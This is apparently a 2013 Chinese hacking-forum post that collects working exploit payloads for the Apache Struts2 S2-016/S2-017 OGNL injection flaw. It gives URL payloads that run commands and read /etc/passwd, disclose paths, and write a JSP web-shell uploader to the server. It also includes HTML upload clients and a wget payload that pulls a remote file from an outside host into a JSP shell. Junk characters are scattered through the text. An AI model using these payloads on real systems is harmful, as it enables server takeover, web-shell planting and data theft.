
标题: Struts2 S2-016/S2-017漏洞执行代码

作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了，我就整理了一下。友情提示：自己小命比shell重要哦。
喜欢就点一下感谢吧^_^

带回显命令执行：

& p% N* V/ N  j4 H$ R9 K! Khttp://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}6 h$ ?# _# T+ d$ s# E

爆路径：
7 Q$ f( }8 u$ @7 v- |2 Z+ Rhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D- [4 ]0 ~% d3 B$ N) M4 l: Q

写文件：
http://www.example.com/struts2-blank/example/X.action?redirect:${+ z7 K, v& `1 Q- X4 q
5 Y8 J. x9 `8 [  l2 M# |$ s4 k
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),( J# p, m4 o8 |" X+ v  y# f8 s

" o2 k% P2 g1 f+ D% a, \8 n%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
6 J( s0 X/ b" K. E2 r* g; D5 {. H& j" z9 B$ O
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()2 R7 |* N6 u3 k! ^) D# r1 X' a8 g* F) C

- X! u! R8 u9 H}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
写入的文件内容：
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
其实就是一个jsp的小马，需要客户端配合。
参数f是文件名，t是内容。
客户端：
. ^6 I3 O1 z& E8 k. B# B  ~  L: h<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
, V9 k8 t, H4 c. M
7 e4 F7 T5 m$ X( i4 V: R( B7 Y<textarea name=t cols=120 rows=10 width=45>your code</textarea>3 ]" C* j7 }  ]* ?" M0 }
, o# [* r9 |6 b" C
<center>( L" l9 C! R: m6 G0 F
! B0 A9 X  c2 K5 T/ P1 R
8 A0 M7 R- o2 ~. f/ d' V' C
, A7 z8 I) s- V
<input type=submit value="提交">) B% U' E' V3 d1 M
- {' ^0 d& ]: d( M) l
</form>
就在当前目录建立一个fjp.jsp。
shell:http://www.example.com/struts2-blank/example/fjp.jsp
还有@园长的一个客户端：
* v/ c* Q. d6 R* N5 C" r; t<html>
% o* ~4 a' a! I- l0 e$ G1 o
9 f! [  U5 v. O! F4 ~4 w<head>
, X' N* z: V- _0 I6 H  O
5 R0 ~' s) N. U<meta http-equiv="content-type" content="text/html;charset=utf-8">
* N0 |# l: E# |! |9 H/ G8 U! n7 q: s' V2 f1 y4 ~
<title>jsp-园长</title>6 M: R. h# ]& @* [" U# z9 R7 k% D2 |
% v$ A8 y- D) G3 q4 |
</head>
# j! x8 G  H4 g) F1 c' a! o- F/ h* o: I" ^: Q$ \7 u
<style>
; p  o" C, h8 B. R& F7 G: i% U* w1 E/ e
.main{width:980px;height:600px;margin:0 auto;}
# q0 C! {; \- M  e
, C) W& |( E, Q5 \( ], |2 C.url{width:300px;}4 t! D: V; R+ P) E4 p

) s9 {" C, U4 q$ P# h  \.fn{width:60px;}; K+ z8 j- L" k1 F1 B
4 k# e+ m3 |* w* Z
.content{width:80%;height:60%;}: Y8 q2 _  I/ `+ {. D# J
8 H- b) H5 i5 e5 Y! w0 f
</style>: u5 H) x! N/ N
' |1 ?" x" \; }% ^; O9 L
<script>
2 ?, h1 w4 T6 ]; `8 |) G' |) b
// Client-side validation for the form #fm. Reads #url, #content and #fn,
// refuses to submit while any of them is empty (first empty field wins and
// is reported with alert()), then points the form at the value of #url and
// submits it. The URL is used as given; nothing about it is checked here.
// Browser-only: relies on the document and alert globals.
function upload(){
  var byId = function(id){ return document.getElementById(id); };

  // All four lookups happen before any validation, as in the original.
  var target = byId('url').value;
  var body = byId('content').value;
  var name = byId('fn').value;
  var fm = byId('fm');

  // Checked in this fixed order; the message text is part of the contract.
  var required = [
    [target, "Url not allowd empty!"],
    [body, "Content not allowd empty!"],
    [name, "FileName not allowd empty!"]
  ];
  for (var i = 0; i < required.length; i++) {
    if (required[i][0].length == 0) {
      alert(required[i][1]);
      return;
    }
  }

  fm.action = target;
  fm.submit();
}
. A) O; [; I: a2 e5 c
</script>
& D) E5 L4 O& g/ C5 }8 [" ^# ]1 w, c# C$ C7 C4 q: Y
<body>
" \& f" t+ n; J$ I
5 L$ r. o% t6 F% L3 l<div class="main">
- a0 e9 ^. b+ |& ]/ R/ d  _/ \0 b, U3 g. U
  <form id="fm" method="post">  
- L. Y: E1 u) K6 B5 Y* z, V. o) g
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
( m' K4 t" |& }8 M' j. y5 x5 X) t5 r+ ^; B+ U9 B5 z
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  ( V2 k) [6 _, K' d3 H; X

  G2 t' o9 s/ W  f9 W  ]( q    <a href="javascript:upload();">Upload</a>
+ U' c4 l( e# F) [8 R/ u  x! i; u( ^2 M0 W  p8 u

2 l  b- v+ q8 w
1 i! Z' k, i, _+ D; y4 `$ H+ J5 l3 j    <textarea id="content" class="content" name="t" ></textarea>
) f# s9 Z3 B$ }+ b  S4 ~) N3 D
5 o) \# U& Z% Y  </form>
: n7 k1 g  D0 ?( ^4 D' P% j8 Q* u% m! V- u4 [* @
</div>
+ z0 q/ K- H1 Q1 l# ]+ A3 r, A9 ?: g
</body>
- U' p5 A/ h' [/ k; d3 p$ ]$ T5 c! {! I8 O- {' N/ T
</html>
还有@X发的一个wget的getshell：
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
) @$ \* p: y& p( H, |' J& `
1 @# G3 {+ t! S5 G& X# h, T( z)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}



